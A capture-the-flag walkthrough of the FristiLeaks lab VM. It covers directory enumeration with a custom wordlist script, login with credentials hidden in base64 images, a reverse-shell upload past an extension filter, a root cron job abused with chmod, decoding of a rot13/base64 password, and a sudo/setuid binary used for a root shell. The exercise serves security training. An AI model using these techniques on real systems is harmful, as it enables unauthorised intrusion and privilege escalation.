FristiLeaks

Description

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.

Enumeration

nmap -p- -sV 192.168.2.19

[screenshot nmap.JPG: nmap scan results]

dirb http://192.168.2.19

[screenshot dirb.JPG: dirb results]

Let’s start with robots.txt

[screenshot robots.JPG: contents of robots.txt]
Nothing there to be found. Every page was filled with a pic saying I’m off track.

[image: the "off track" meme shown on every page]

I made a list of all the words found on the pages and ran dirb with it as the wordlist.
Finally another lead: /fristi/.

[screenshot: dirb results with the custom wordlist, showing /fristi/]
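The wordlist step above is what tools like CeWL automate. As an added example, not part of the original writeup, here is a small Python 3 script (standard library only) that pulls the words out of a page's visible text, its HTML comments and its link paths, deduplicates them and writes a dirb wordlist. The sample page and the script name wordlist.py are constructed for the example; the real target URLs are passed on the command line.

```python
"""Build a dirb wordlist from the words found on a site's pages (added example)."""
import re
import sys
import urllib.request
from html.parser import HTMLParser


class TextExtractor(HTMLParser):
    """Collect visible text, comments and link paths; skip script/style bodies."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        # Paths in links are worth harvesting too: href="/fristi/" -> "fristi"
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.chunks.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

    def handle_comment(self, data):
        # Developer comments often leak names and TODOs; keep them.
        self.chunks.append(data)


def words_from_html(html, min_len=3):
    """Return the unique lowercased words of an HTML document, in first-seen order."""
    parser = TextExtractor()
    parser.feed(html)
    seen = {}
    for chunk in parser.chunks:
        for word in re.findall(r"[A-Za-z0-9_-]+", chunk):
            if len(word) >= min_len:
                seen.setdefault(word.lower(), None)
    return list(seen)


def build_wordlist(urls, out_path):
    """Fetch each URL, merge the words and write them one per line to out_path."""
    words = {}
    for url in urls:
        with urllib.request.urlopen(url, timeout=10) as resp:
            html = resp.read().decode("utf-8", errors="replace")
        for w in words_from_html(html):
            words.setdefault(w, None)
    with open(out_path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


# Constructed sample page standing in for one of the target's pages.
SAMPLE_HTML = """<html><head><title>Fristi Drinks</title>
<style>body{color:red}</style></head>
<body><!-- TODO: clean up, by eezeepz -->
<h1>Welcome</h1><p>You are off track. Drink more Fristi!</p>
<a href="/images/meme.png">pic</a></body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 2:
        # python3 wordlist.py http://target/ http://target/page2 words.txt
        n = build_wordlist(sys.argv[1:-1], sys.argv[-1])
        print(f"wrote {n} words to {sys.argv[-1]}")
    else:
        print("\n".join(words_from_html(SAMPLE_HTML)))
```

Run it as `python3 wordlist.py http://192.168.2.19/ http://192.168.2.19/index.html words.txt` and then `dirb http://192.168.2.19 words.txt`. Keeping HTML comments is deliberate: names left in developer comments, like the eezeepz credit that turns up later in this writeup, are exactly the kind of token you want in the list.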

This seems to be the login portal, with username:password authentication.
No SQLi or other notable vulnerabilities. Let's look at the source code.
A comment in the page suggests that the images are base64 encoded. Decoding them with an online base64 decoder shows that the first blob is the Simpsons picture and the second one is a small image showing a combination of two letters.

[screenshot: base64-encoded images in the page source]

The source also says this page was created by eezeepz. Would this name plus the letters from the picture be the right combination to log in? Yes it would. 🙂

[screenshot: successful login]

Ok. Now to upload a 'dirty' file. There is a filter that only allows files with the extension jpg, gif or png. Time to fire up Burp Suite and tamper with the file extension. I prefer the php-reverse-shell from pentestmonkey.
The upload succeeded, and in the meantime I had started a listener on port 31337.

[screenshot: reverse shell caught on port 31337]

After checking the /home/ directory it seems I can only read the directory of eezeepz.
Inside there is a text file named 'notes'.

[screenshot: contents of the notes file]

Ok. So I have access to echo and chmod, and I can use them from /home/admin/.
And a file named runthis in /tmp/ gets executed by root every minute. Well, that's nice. Let's make /home/admin/ world writable.

echo "/home/admin/chmod -R 777 /home/admin" > /tmp/runthis

Success!

Let’s check out the /home/admin/ directory. Inside there are a few interesting files.

[screenshot: listing of /home/admin/]

Let’s start with whoisyourgodnow.txt first.

cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

Hmmmmmm. Let’s try another one.

cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

Hmmmmmm. Still nothing.

sh-4.1$ cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
# (Python 2 script as found on the VM: print statement, b64encode on a str)
import base64,codecs,sys

def encodeString(str):
    # base64-encode, reverse the result, then apply rot13
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

Right.
So the string in cryptedpass.txt was produced by cryptpass.py and now needs to be reversed. The script base64-encodes, reverses and rot13s, so decoding is the same steps backwards: rot13 (which is its own inverse), un-reverse, base64-decode. Let's write a similar script to reverse the process.

[screenshots: the decryption script and its output]
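The decoder, written out as an added Python 3 example (not the script from the original screenshots): cryptpass.py base64-encodes the input, reverses the result and applies rot13, so decoding applies rot13 (its own inverse), un-reverses and base64-decodes. encode_string is a Python 3 port of the VM's encodeString, used only to round-trip the result; the ciphertexts are the two strings from /home/admin/ quoted above.

```python
"""Reverse cryptpass.py: base64 -> reverse -> rot13, undone in the opposite order."""
import base64
import codecs


def encode_string(s: str) -> str:
    """Python 3 port of the VM's encodeString, kept for round-trip checking."""
    b64 = base64.b64encode(s.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(c: str) -> str:
    """rot13 is its own inverse; then un-reverse; then base64-decode."""
    b64 = codecs.decode(c, "rot13")[::-1]
    return base64.b64decode(b64).decode()


# The two ciphertexts found in /home/admin/ on the VM.
CIPHERTEXTS = {
    "cryptedpass.txt": "mVGZ3O3omkJLmy2pcuTq",
    "whoisyourgodnow.txt": "=RFn0AKnlMHMPIzpyuTI0ITG",
}

if __name__ == "__main__":
    for name, c in CIPHERTEXTS.items():
        p = decode_string(c)
        assert encode_string(p) == c, "round trip failed"
        print(f"{name}: {p}")
```

The round-trip assert is there because a transposition of the steps (reversing before rot13, say) happens to give the same result here only because rot13 acts per character; when porting an unknown "crypto" script, re-encode the recovered plaintext and compare before trusting it as a password.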

So, I now have two plaintexts. Since one of the ciphertext files is owned by a user called fristigod, it could be rewarding to switch to that user.

su fristigod
standard in must be a tty

I need a tty. Let's get one.

python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su fristigod
Password: LetThereBeFristi!

bash-4.1$ whoami
fristigod

Let’s find more stuff from fristigod.

find / -print 2>/dev/null | grep -i fristigod
/var/fristigod
/var/fristigod/.bash_history
/var/fristigod/.secret_admin_stuff
/var/fristigod/.secret_admin_stuff/doCom

Who doesn’t like secret stuff? What could it be?

file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
bash-4.1$ ./doCom
Nice try, but wrong user 😉

Bummer.  But what can this account do?

sudo -l -U fristigod

Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

So fristigod can run doCom, but only as fristi. Let's try that.

sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
bash-4.1$ sudo -u fristi ./doCom whoami
root

The binary is setuid (see the file output above) and hands its argument to a shell, so whatever command it is given runs as root, not as fristi. Alright, time to wrap things up.

sudo -u fristi ./doCom /bin/bash
bash-4.1# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Let's go to the root directory and take a look inside.
There is a file named fristileaks_secrets.txt.

cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it’s supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Too bad, not within the 4 hours. But hey, there is always room for improvement.

 
